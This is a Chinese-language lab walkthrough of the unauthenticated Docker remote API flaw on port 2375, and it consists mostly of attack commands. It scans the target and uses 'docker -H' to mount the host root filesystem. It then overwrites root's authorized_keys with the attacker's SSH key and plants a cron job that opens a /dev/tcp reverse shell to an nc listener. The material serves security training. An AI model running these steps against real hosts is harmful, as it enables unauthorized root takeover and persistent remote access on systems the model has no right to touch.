目录
一.Docker简介
二.Docker漏洞产生原因
三.Docker未授权漏洞复现
1.docker实验环境
2.漏洞复现
第一步,信息收集
第二步,访问2375端口
发现page not found(页面没有找到)代表json代表2375有存在漏洞
第三步,查看info目录
第四步,docker链接目标机器
编辑 第五步.docker未授权写ssh公钥得到shell:
编辑
第六步 ,ssh进行连接
四,docker未授权写定时任务获取shell
1.启动容器挂载到宿主机
2.kali开启监听
编辑
3.写入定时反弹shell
4.查看定时任务
5.获得目标shell
一.Docker简介
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。(Sandbox又叫沙箱、沙盘,即是一个虚拟系统程序,允许你在沙盘环境中运行浏览器或其他程序,因此运行所产生的变化可以随后删除)
二.Docker漏洞产生原因
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
三.Docker未授权漏洞复现
1.docker实验环境
目标机器: CentOS7 Docker、IP:10.1.1.200 攻击机器:Kali Docker、IP:10.1.1.100 虚拟机实验环境链接:https://www.hetianlab.com/expc.do?ec=ECIDcc41-1aa8-4db8-8f69-7e834b8aa17b 来源:合天网安实验室
2.漏洞复现
第一步,信息收集
nmap -p- -sV -T4 10.1.1.200
第二步,访问2375端口
发现page not found(页面没有找到)代表json代表2375有存在漏洞
第三步,查看info目录
info一般指的是安全目录,通过安全目录查看docker消息
获取image
10.1.1.200:2375/images/json
第四步,docker链接目标机器
通过docker -H参数连接目标docker docker -H tcp://10.1.1.200 ps -a //列出所有容器
docker -H tcp://10.1.1.200 images //列出所有镜像
docker -H tcp://10.1.1.200 start 3dc8d67b679 //开启一个停止的容器
连接一个已经启动的容器:四种方法 docker - H tcp://10.1.1.200 exec -it 3dc8d67b679 bash docker - H tcp://10.1.1.200 attach 3dc8d67b679(容器id) docker -H tcp://10.1.1.200 run -it -v /:/mnt--entrypoint /bin/bash 4c9608fd76ba(镜像的id) //mnt为挂载点 ----entrypoint是入口 docker -H tcp://10.1.1.200:2375 run -it -v /:/mnt busybox chroot /mnt sh //创建一个新的容器busybox容器,讲宿主机的磁盘挂载到容器
第五步.docker未授权写ssh公钥得到shell:
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba //启动一个容器,挂载宿主机的/mnt目录
ssh-keygen -t rsa //生成一个ssh公钥
cat /root/.ssh/id_rsa.pub //查看生成的公钥
讲公钥写到目标/root/.ssh/authorized_keys文件中
公钥内容: echo "sshrsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2ireX9ybOimMcML2K4gDqC4q0Gx7tgg1K6l4gYUHKQ/00a6O4l5cENirdgWrL/5S6Z/7LkVrxeQQKSKUjvk/3v o3fE8ArdNLUbyGIDhsabuHLpgs5bT HTrIegvymhMbftPnwYiR2GRZ vNdQuIJjwD nTQGR8ANOLSKNH0uIb1ZgOMcJC2IHIqtueC2t/MhY6Ot8mZnPCijeRfZean4AELfa2EJ0KZy1n68s1IJHJJuAo6 Ckf81dB1gnRtsm/5jp5YW/AEv9GfcrYv6 22hlFN2MAt1JH iRPup/9joofCG/eSGEZmhPfjcPguhTOt4GqjqPVlPpWPSsGzjYnWpRrjJpVEdcoli9MaobCja/YtO1iN2SgLUUeMSRf ysNHuvd5oOIpJBMYiGjY2pwZ45zEuqvI2P zjCxVCYNhzVKNv 7FIaDLYZQPSMn9bYf6j0zhrvDuPWUkI0iaDTlf0Oq1nwesWDhJRIybWMfTjV UdDxNvz2GiMKo73GLvhs= root@kali" > /mnt/root/.ssh/authorized_keys
>这个代表的意思为覆盖 所以在最后一句加入的意思是讲公钥内容覆盖到/mnt/root/.ssh/authorized_keys中
第六步 ,ssh进行连接
ssh root@10.1.1.200 -i id_rsa
四,docker未授权写定时任务获取shell
1.启动容器挂载到宿主机
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba
2.kali开启监听
nc -lvvp 1212 //监听1212端口
3.写入定时反弹shell
echo "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1" > /mnt/var/spool/cron/root
4.查看定时任务
cat /mnt/var/spool/cron/root //查看写入到/mnt/var/spool/cron/root的任务
5.获得目标shell
输入whoami查看用户
实验结束!!!